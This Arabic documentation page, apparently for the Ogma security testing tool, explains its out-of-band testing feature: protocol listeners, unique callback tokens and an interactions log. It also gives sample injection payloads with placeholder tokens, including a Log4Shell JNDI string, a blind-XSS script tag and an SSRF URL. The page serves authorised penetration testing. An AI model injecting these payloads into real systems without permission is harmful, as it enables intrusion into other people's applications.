---
url: https://docs.ogmabox.com/ar/app/utilities/oast.md
description: أعد الاتصالات الراجعة لاختبار أمان التطبيقات خارج القناة في Ogma.
---

# OAST {#oast}

يكشف OAST (اختبار أمان التطبيقات خارج القناة) الثغرات التي لا تنتج استجابة مرئية؛ إذ ينشئ الهدف بدلا من ذلك اتصالا صادرا إلى مستمع تتحكم فيه، مما يؤكد المشكلة.

## آلية العمل {#how-it-works}

يشغل Ogma مستمعين محليين لعدة بروتوكولات. عندما يتصل التطبيق الهدف بأحد هؤلاء المستمعين، يسجل التفاعل مع عنوان IP المصدر والطابع الزمني والبيانات المستلمة والرمز الذي حقن.

### بروتوكولات المستمعين {#listener-protocols}

| البروتوكول | المنفذ الافتراضي | حالة الاستخدام |
|---|---|---|
| HTTP | قابل للإعداد | SSRF وXSS الأعمى وخطافات الويب |
| HTTPS | قابل للإعداد | SSRF عبر TLS |
| DNS | قابل للإعداد | الحقن الأعمى وXXE وlog4shell |
| SMTP | قابل للإعداد | حقن ترويسات البريد الإلكتروني وSSRF إلى خدمات البريد |

أعد منافذ المستمعين واسم النطاق المستخدم في الرموز المولدة في لوحة إعدادات OAST.

## توليد رمز اتصال راجع {#generating-a-callback-token}

1. افتح **الأدوات المساعدة > OAST**.
2. انقر **توليد رمز**. يكون كل رمز فريدا لكل اختبار.
3. انسخ الرمز. يتضمن نطاق المستمع ومعرفا فريدا لربط التفاعلات بالاختبار المحدد الذي تسبب فيها.

مثال على صيغة الرمز: `[unique-id].[your-oast-domain]`

## استخدام الرموز في الحمولات {#using-tokens-in-payloads}

احقن رمز الاتصال الراجع في أي حقل قد يدفع التطبيق إلى إنشاء اتصال صادر:

* **SSRF**: استخدم رمز HTTP/HTTPS بوصفه عنوان URL الهدف: `https://[token]/`
* **XXE**: أشر إلى الرمز في DOCTYPE أو في عنوان URL لكيان خارجي.
* **Log4Shell**: ضعه في ترويسة: `${jndi:ldap://[token]/a}`
* **XSS الأعمى**: احقنه في خاصية src لعنصر script: `<script src="https://[token]/x.js"></script>`
* **حقن SMTP**: استخدمه بوصفه عنوان وجهة أو عنوان URL في ترويسات البريد الإلكتروني.

## سجل التفاعلات {#interactions-log}

تعرض لوحة التفاعلات كل اتصال راجع مستلم:

| العمود | الوصف |
|---|---|
| الوقت | وقت استلام التفاعل |
| البروتوكول | HTTP أو HTTPS أو DNS أو SMTP |
| عنوان IP المصدر | عنوان IP الذي أنشأ الاتصال |
| الرمز | الرمز الذي جرى الاتصال به |
| البيانات | مسار الطلب أو اسم استعلام DNS أو بيانات SMTP |

انقر أي صف لعرض تفاصيل التفاعل كاملة، بما فيها ترويسات الطلب ومتنه حيثما ينطبق ذلك.

## ربط التفاعلات بالاختبارات {#matching-interactions-to-tests}

لأن كل رمز فريد، يمكنك حقن رموز مختلفة في معاملات أو طلبات مختلفة وتحديد نقطة الحقن التي تسببت في الاتصال الراجع بدقة.

## صفحات ذات صلة {#related-pages}

* [الماسح الأمني](./scanner.md)
* [النتائج](../findings.md)
